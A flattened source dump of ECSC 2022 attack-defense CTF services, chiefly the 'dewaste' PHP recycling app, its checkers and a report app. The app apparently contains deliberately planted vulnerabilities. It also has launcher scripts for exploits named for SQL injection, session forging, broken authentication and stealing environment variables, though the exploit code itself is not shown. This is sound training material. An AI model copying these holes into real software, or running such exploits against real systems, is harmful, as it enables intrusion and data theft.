| version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | beautifulsoup4 3 | Faker==15.0.0 4 | Pillow==9.2.0 5 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/run-first-view-ticks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | max="$1" 4 | if [ -z "$max" ]; then 5 | max=6 6 | fi 7 | 8 | docker-compose build 9 | for i in $(seq 0 $max); do 10 | TICK=$i docker-compose up 11 | done 12 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/checkers/checker2/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium==4.4.3 2 | Pillow==9.2.0 3 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/run_dev.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | docker run -t -i --network=host --env DISPLAY=$DISPLAY --volume $XAUTH:/root/.Xauthority -v "$(pwd)":/checker dewaste2:latest localhost 1 0 4 | -------------------------------------------------------------------------------- /dewaste/dewaste.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dewaste.png -------------------------------------------------------------------------------- /dewaste/dist/README.md: -------------------------------------------------------------------------------- 1 | # dewaste 2 | 3 | ## Flag IDs 4 | A short disclaimer about the flag IDs for flagstore 1. 5 | 6 | There is additional structure to the flag ids. Depending on the start of the flag id string, the flag is stored differently. 7 | 8 | Flag id types (everything before the first '-'): 9 | * physical_acc: `physical_acc-{email}-{item_id}` 10 | * physical_noacc: `physical_noacc-{item_id}` 11 | * digital_acc: `digital_acc-{email}-{item_id}` 12 | * digital_noacc: `digital_noacc-{item_id}` 13 | 14 | In this format you find: 15 | * Which type of item you are looking for (physical or digital) 16 | * The id of the item that you are looking for 17 | * In case an account is used to register the item, you have the email address of the registering user account 18 | 19 | Flagstore 2 does not have any flag ID associated. 20 | 21 | Happy hacking! 22 | -------------------------------------------------------------------------------- /dewaste/dist/db/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM postgres:14.5 2 | COPY ./schema.sql /docker-entrypoint-initdb.d/schema.sql 3 | -------------------------------------------------------------------------------- /dewaste/dist/web/.dockerignore: -------------------------------------------------------------------------------- 1 | /vendor/ 2 | /.idea/ -------------------------------------------------------------------------------- /dewaste/dist/web/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "rinux/ecsc2022", 3 | "type": "project", 4 | "autoload": { 5 | "psr-4": { 6 | "App\\": "App/" 7 | } 8 | }, 9 | "autoload-dev": { 10 | "psr-4": { 11 | "App\\": "src/App/" 12 | } 13 | }, 14 | "require": { 15 | "ext-openssl": "*", 16 | "ext-pdo": "*", 17 | "fortawesome/font-awesome": "6.1.2", 18 | "psr/container": "2.0.2", 19 | "psr/log": "3", 20 | "twbs/bootstrap": "5.2.0" 21 | }, 22 | "require-dev": { 23 | "squizlabs/php_codesniffer": "^3.5", 24 | "phpstan/phpstan": "^1.8.2" 25 | }, 26 | "scripts": { 27 | "dev:lint": "phpcs -s src/", 28 | "dev:fix-lint": "phpcbf src/" 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /dewaste/dist/web/docker/app-cron.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cmd="/usr/local/bin/php /var/www/html/cli.php" 4 | 5 | i=0 6 | while [ true ] 7 | do 8 | if [[ $i -eq 12 ]]; then 9 | $cmd --cleanup-files --cleanup-database 10 | i=0 11 | fi 12 | 13 | $cmd --process-data-item 14 | 15 | sleep 5 16 | 17 | i=$((i+1)) 18 | done 19 | -------------------------------------------------------------------------------- /dewaste/dist/web/docker/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Starting background tasks" 4 | /app-cron.sh & 5 | 6 | echo "Starting server" 7 | apache2-foreground -------------------------------------------------------------------------------- /dewaste/dist/web/phpcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | src/ 4 | 5 | 6 | 7 | 8 | 9 | *Clause.php 10 | 11 | 12 | */config.php 13 | 14 | -------------------------------------------------------------------------------- /dewaste/dist/web/phpstan.neon: -------------------------------------------------------------------------------- 1 | parameters: 2 | level: 9 3 | paths: 4 | - src 5 | excludePaths: 6 | - src/common.php 7 | bootstrapFiles: 8 | - src/common.php 9 | ignoreErrors: 10 | - '/Parameter #1 \$row of method App\\Persistence\\[a-zA-Z\\]+DAO::parseRow\(\) expects array.*, mixed given/' -------------------------------------------------------------------------------- /dewaste/dist/web/src/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine On 2 | 3 | RewriteCond %{REQUEST_FILENAME} !-d 4 | RewriteCond %{REQUEST_FILENAME} !-f 5 | RewriteRule .* index.php [L] -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Controllers/RankingController.php: -------------------------------------------------------------------------------- 1 | rankingService->getCurrentRanking(); 21 | $rankingTemplate = $this->template->dynamicTemplate("ranking.php", ranking: $ranking); 22 | return $this->template->withMainLayout("Ranking", $rankingTemplate); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Analysis/AnalysisResult.php: -------------------------------------------------------------------------------- 1 | */ 8 | public array $deserializers = []; 9 | 10 | public function addDeserializer(string $type, callable $method): void 11 | { 12 | $this->deserializers[$type] = $method; 13 | } 14 | 15 | public function create(string $type, string $serializedResult): AnalysisResult 16 | { 17 | $d = $this->deserializers[$type] ?? throw new \InvalidArgumentException("Unknown type: $type"); 18 | return $d($serializedResult); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Analysis/FileAnalysisResult.php: -------------------------------------------------------------------------------- 1 | output; 17 | } 18 | 19 | public function renderData(): string 20 | { 21 | return $this->output; 22 | } 23 | 24 | public static function deserialize(string $data): self 25 | { 26 | return new self($data); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Controller.php: -------------------------------------------------------------------------------- 1 | baseUrl; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/DigitalItemStatus.php: -------------------------------------------------------------------------------- 1 | question = $question; 13 | $this->answer = $answer; 14 | } 15 | 16 | public function getQuestion(): string 17 | { 18 | return $this->question; 19 | } 20 | 21 | public function getAnswer(): string 22 | { 23 | return $this->answer; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/PhysicalItemStatus.php: -------------------------------------------------------------------------------- 1 | target; 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/DatabaseManager.php: -------------------------------------------------------------------------------- 1 | host;port=5432;dbname=$this->name;", $this->user, $this->password); 18 | $db->setAttribute(\PDO::ATTR_ERRMODE, \PDO::ERRMODE_EXCEPTION); 19 | $db->setAttribute(\PDO::ATTR_EMULATE_PREPARES, true); 20 | return $db; 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/PDO.php: -------------------------------------------------------------------------------- 1 | |null $options 14 | */ 15 | public function __construct(string $dsn, ?string $username = null, ?string $password = null, ?array $options = null) 16 | { 17 | parent::__construct($dsn, $username, $password, $options); 18 | } 19 | 20 | public function getQueryBuilder(): QueryBuilder 21 | { 22 | return new QueryBuilder($this); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/ParseResultsTrait.php: -------------------------------------------------------------------------------- 1 | 13 | */ 14 | private function parseResults(\PDOStatement $stmt): array 15 | { 16 | $ret = []; 17 | while ($row = $stmt->fetch(\PDO::FETCH_ASSOC)) { 18 | $ret[] = $this->parseRow($row); 19 | } 20 | return $ret; 21 | } 22 | 23 | /** 24 | * @param array $row 25 | * @return T 26 | */ 27 | abstract protected function parseRow(array $row): object; 28 | } 29 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/AbstractClause.php: -------------------------------------------------------------------------------- 1 | generateRec("a", (mt_rand() % 20) + 1); 12 | } 13 | 14 | private function generateRec(string $x, int $level): string 15 | { 16 | if ($level === 0) { 17 | return $x; 18 | } 19 | $x .= substr(self::CHARSET, mt_rand() % strlen(self::CHARSET), 1); 20 | return $this->generateRec($x, $level - 1); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/AndClause.php: -------------------------------------------------------------------------------- 1 | clauses = $clauses; 13 | } 14 | 15 | public function _or(AbstractClause $clause): AbstractClause 16 | { 17 | return new OrClause($this, $clause); 18 | } 19 | 20 | public function _and(AbstractClause $clause): AbstractClause 21 | { 22 | $this->clauses[] = $clause; 23 | return $this; 24 | } 25 | 26 | public function render(): string 27 | { 28 | return "(" . implode(" AND ", array_map(fn($x) => $x->render(), $this->clauses)) . ")"; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/OrClause.php: -------------------------------------------------------------------------------- 1 | clauses = $clauses; 13 | } 14 | 15 | 16 | public function _or(AbstractClause $clause): OrClause 17 | { 18 | $this->clauses[] = $clause; 19 | return $this; 20 | } 21 | 22 | public function _and(AbstractClause $clause): AndClause 23 | { 24 | return new AndClause($this, $clause); 25 | } 26 | 27 | public function render(): string 28 | { 29 | return "(" . implode(" OR ", array_map(fn($x) => $x->render(), $this->clauses)) . ")"; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/Value.php: -------------------------------------------------------------------------------- 1 | value)) { 14 | $enclosing = (new AlnumGenerator())->generate(); 15 | return "\$$enclosing\$" . $this->value . "\$$enclosing\$"; 16 | } elseif (is_int($this->value) || is_float($this->value)) { 17 | return "$this->value"; 18 | } 19 | throw new \AssertionError("Not a valid value type: " . get_debug_type($this->value)); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Service/Analysis/AnalysisMethod.php: -------------------------------------------------------------------------------- 1 | 21 | */ 22 | abstract public function run(?User $user, DigitalItem $item, string $data): array; 23 | } 24 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Service/SessionService.php: -------------------------------------------------------------------------------- 1 | ensureStarted(); 21 | if ($user !== null) { 22 | $_SESSION[self::USER_KEY] = $user; 23 | } else { 24 | unset($_SESSION[self::USER_KEY]); 25 | } 26 | } 27 | 28 | public function getUser(): ?User 29 | { 30 | $this->ensureStarted(); 31 | return $_SESSION[self::USER_KEY] ?? null; 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4GM-aUWA.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4GM-aUWA.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4HM-Y.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4HM-Y.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4JM-aUWA.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4JM-aUWA.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YLNlaw.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YLNlaw.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/pxiKyp0ihIEF2isfFJU.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/pxiKyp0ihIEF2isfFJU.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/img/founders.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/img/founders.jpg -------------------------------------------------------------------------------- /dewaste/dist/web/src/img/hills.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/img/hills.jpg -------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/login.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 |
9 |
10 | 11 | 13 |
14 |
15 | 16 | 17 |
18 | 19 |
20 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/recycle/myitem_physical.php: -------------------------------------------------------------------------------- 1 | 8 | 9 |

Item

10 | 11 |
Type:
12 |
Physical
13 | 14 |
S/N:
15 |
serial ?? "") ?>
16 | 17 |
Dimensions:
18 |
length/$item?->width/$item?->height"?> cm
19 | 20 |
Weight:
21 |
weight?> kg
22 | 23 |
Status:
24 |
status->value ?? "")?>
25 | 26 |
Description:
27 | 
description ?? "")?>
28 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/recycle/registration_template.php: -------------------------------------------------------------------------------- 1 | 8 |

Recycle

9 |

10 | can recycle electronic junk and old archives. If you are interested in our 11 | physical and digital processing methodology, please visit the 12 | FAQ page. 13 | 14 | 15 |

16 | "> 18 | E-waste 19 | 20 | "> 22 | Digital Archives 23 | 24 |
25 | 26 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/micropip-0.1-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/micropip-0.1-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/packaging-21.3-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/packaging-21.3-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyodide.asm.data: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyodide.asm.data -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyodide.asm.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyodide.asm.wasm -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyparsing-3.0.9-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyparsing-3.0.9-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/exploits/README.md: -------------------------------------------------------------------------------- 1 | Each of the provided exploits has a Dockerfile attached. 2 | To build and run the exploits you can use the provided `run.sh` 3 | 4 | Usage: `./run.sh ` 5 | 6 | Example: `./run.sh 10.2.0.2 test@example.com` -------------------------------------------------------------------------------- /dewaste/exploits/broken_auth/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/broken_auth/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | startid="$2" 5 | 6 | IMAGENAME="exploit-broken-auth" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "startid=$startid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/session-forging/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/session-forging/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-session-forging" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/sqli_faq/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8.0-cli 2 | RUN apt-get update && apt-get install -y curl 3 | 4 | RUN mkdir -p /app 5 | WORKDIR "/app" 6 | 7 | COPY exploit.php ./ 8 | CMD php exploit.php -------------------------------------------------------------------------------- /dewaste/exploits/sqli_faq/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | 5 | IMAGENAME="exploit-sqli-faq" 6 | 7 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "TARGET=$host" "$IMAGENAME" 8 | -------------------------------------------------------------------------------- /dewaste/exploits/sqli_login/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/sqli_login/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-sqli-login" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/steal_env_variable/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/steal_env_variable/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-steal-envs" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=dewaste 2 | -------------------------------------------------------------------------------- /dewaste/report_app/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # update and install sqlite3 and building toolchain for cryptography 5 | RUN apk update && apk add --upgrade sqlite build-base libffi-dev 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # copy every content from the local file to the image 11 | COPY . /app 12 | 13 | # install the dependencies and packages in the requirements file 14 | RUN pip install -r requirements.txt 15 | 16 | # create a new DB 17 | RUN rm -f report.db 18 | RUN sqlite3 report.db < schema.sql 19 | 20 | ENTRYPOINT [ "python" ] 21 | CMD [ "report.py" ] -------------------------------------------------------------------------------- /dewaste/report_app/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | networks: 4 | external: 5 | name: gamenet 6 | 7 | services: 8 | dewaste-report-app: 9 | restart: always 10 | build: . 11 | ports: 12 | - "11111:5000" 13 | networks: 14 | - external 15 | logging: 16 | driver: "json-file" 17 | options: 18 | max-size: 10m 19 | max-file: "3" 20 | -------------------------------------------------------------------------------- /dewaste/report_app/pow_cracker.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python3 2 | 3 | from os import urandom 4 | from hashlib import sha256 5 | from base64 import b64encode 6 | 7 | def crack(salt, suffix): 8 | seq = b'' 9 | while not sha256(salt + seq).digest().endswith(suffix): 10 | seq = urandom(8) 11 | return b64encode(seq) 12 | 13 | # example 14 | print(crack(b'\xbd\xc8\x1a\x0b\r\x04\x93\x08', b'\xc2\xb5\xaf')) -------------------------------------------------------------------------------- /dewaste/report_app/public_key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq53hKJ3NpItm7MnJ8Zns 3 | TP9G2vOGE84L1NgTx1WSSknoF5ZuTTBjzVnlH94Q3aDRRw5Q4CQ3yT6auPWM47EU 4 | ur8Pm08EGBUcxUm0IRjdySts0bETZzngZS/Usr5Yj1dSa3WTuncKW2siNNsVVCv8 5 | Di3B/roRDvq/RqdN3qsIRlsWgM5h18I7KZ/YPCsDA5g7vhyFoBlM1+f4m7mMJd/d 6 | hRA7ZOgpwYIDbY2Yncbg+VyBMPNLkwsOU8jWe7KY+KY/xiqVr02lMg0jXc6lY0zZ 7 | 8xV9xiXa87viYucgsjtVhO5fPZFAreBt92Z3tXDBLyv2kjOmAtrfpGJ8Ax8C3yyo 8 | YPEBYw+xvRPxcM0XVKJh07OZxBTb3YqO6+uI/PL55Piu2eDDaM4kt/RD/cD3hJ1r 9 | HTewRmmYJ6SoUj/Qt1MachALtvk+ZZhL+tie0ER4VT8rYvO7+OP87bIsnxYDDNam 10 | ZCYi7Qw9lNGm/sLGk6sHArGyMUrvjFzQlddNugHW9Oogkl87Bqf1C9hLtbL0S7VD 11 | H0TEHQbR9Jh+wkweJ0pFT/hgrN56jWDdKjsSPWeTWxlPckKeHO1OfTeczznLLoDU 12 | ZQe08JYgMLyr23Jt1eEfoqcOXoC2RlrNmW9fw4Pw07ETMxN1uE6TdMpxa5Nk+5cW 13 | rQPY6e/7lAERxMwyP2R1BNsCAwEAAQ== 14 | -----END PUBLIC KEY----- 15 | -------------------------------------------------------------------------------- /dewaste/report_app/requirements.txt: -------------------------------------------------------------------------------- 1 | cachelib==0.9.0 2 | cffi==1.15.1 3 | click==8.1.3 4 | cryptography==38.0.1 5 | Flask==2.2.2 6 | Flask-Session==0.4.0 7 | importlib-metadata==4.12.0 8 | itsdangerous==2.1.2 9 | Jinja2==3.1.2 10 | MarkupSafe==2.1.1 11 | pycparser==2.21 12 | Werkzeug==2.2.2 13 | zipp==3.8.1 14 | -------------------------------------------------------------------------------- /dewaste/report_app/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS links( 2 | id INTEGER PRIMARY KEY, 3 | url TEXT NOT NULL, 4 | uuid TEXT NOT NULL UNIQUE, 5 | visited INTEGER NOT NULL DEFAULT 0 6 | ); 7 | 8 | CREATE TABLE IF NOT EXISTS messages( 9 | id INTEGER PRIMARY KEY, 10 | link_id INTEGER NOT NULL, 11 | message TEXT, 12 | ts TIMESTAMP, 13 | FOREIGN KEY(link_id) REFERENCES links(id) 14 | ); -------------------------------------------------------------------------------- /dewaste/report_app/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .error { 2 | background-color: rgb(167, 7, 7); 3 | color: #ffffff; 4 | padding: 1rem; 5 | border-radius: 3px; 6 | } -------------------------------------------------------------------------------- /dewaste/report_app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | DEWASTE - Bug Report App 9 | 10 | 11 |
12 | {% if error %} 13 |

Error: {{ error }}

14 | {% endif %} 15 | {% block content %}{% endblock %} 16 |
17 | 18 | -------------------------------------------------------------------------------- /dewaste/report_app/templates/messages.html: -------------------------------------------------------------------------------- 1 | {% extends 'base.html' %} 2 | {% block content %} 3 | {% if not error %} 4 |

Issue #{{ link_uuid }}

5 | {% for message in messages %} 6 |
7 | {{ message.message }} 8 |
9 | Message sent @ {{ message.ts }} 10 |
11 |
12 | {% endfor %} 13 | 14 |
15 | 16 |
17 | {% endif %} 18 | {% endblock %} -------------------------------------------------------------------------------- /dewaste/vulnbot/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/vulnbot/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/vulnbot/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium==4.4.3 2 | Pillow==9.2.0 3 | requests==2.28.1 4 | cffi==1.15.1 5 | cryptography==38.0.1 -------------------------------------------------------------------------------- /dewaste/vulnbot/run_dev.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | docker build -t dewastebot:latest . 5 | docker run -t -i --network=host --env DISPLAY=$DISPLAY --volume $XAUTH:/root/.Xauthority -v $PWD:/checker dewastebot:latest localhost 1 20 6 | -------------------------------------------------------------------------------- /hps/.gitignore: -------------------------------------------------------------------------------- 1 | venv/ 2 | .idea/ 3 | -------------------------------------------------------------------------------- /hps/README.md: -------------------------------------------------------------------------------- 1 | HPS 2 | === 3 | We discovered this hydroelectric power station in the Austrian Alps around 10 years ago. Vegetation took over the buildings, and most systems were unusable due to corrosion. But the massive dam was built to last, not showing cracks or other signs of structural breakdown. We needed clean power, so we started looting other power plants and abandoned factories to repair the damaged equipment. 4 | 5 | Even if most systems are old and faulty, now the power station represents our only permanent power source that relies entirely on renewable sources. The amount of energy produced is so large that we can even accumulate the surplus for non-essential activities. We also discovered that we could perform cold starts to recover from blackouts by manually forcing the system to open its central valve. -------------------------------------------------------------------------------- /hps/ca_stuff/ca.srl: -------------------------------------------------------------------------------- 1 | B64F785DEDB0B1A6 2 | -------------------------------------------------------------------------------- /hps/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY ca.crt commander.crt commander.key / 11 | RUN chmod +x /checker/checker.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | ENV PYTHONUNBUFFERED=1 15 | WORKDIR /tmp 16 | 17 | # set this to _checker 18 | ENV CTF_SERVICE hps_checker1 19 | -------------------------------------------------------------------------------- /hps/checkers/checker1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /hps/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | paho-mqtt -------------------------------------------------------------------------------- /hps/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | RUN apt-get update && apt-get install -y zip 9 | COPY checker.py firmware_utils.py firmware_generator.py private.pem /checker/ 10 | COPY ca.crt commander.crt 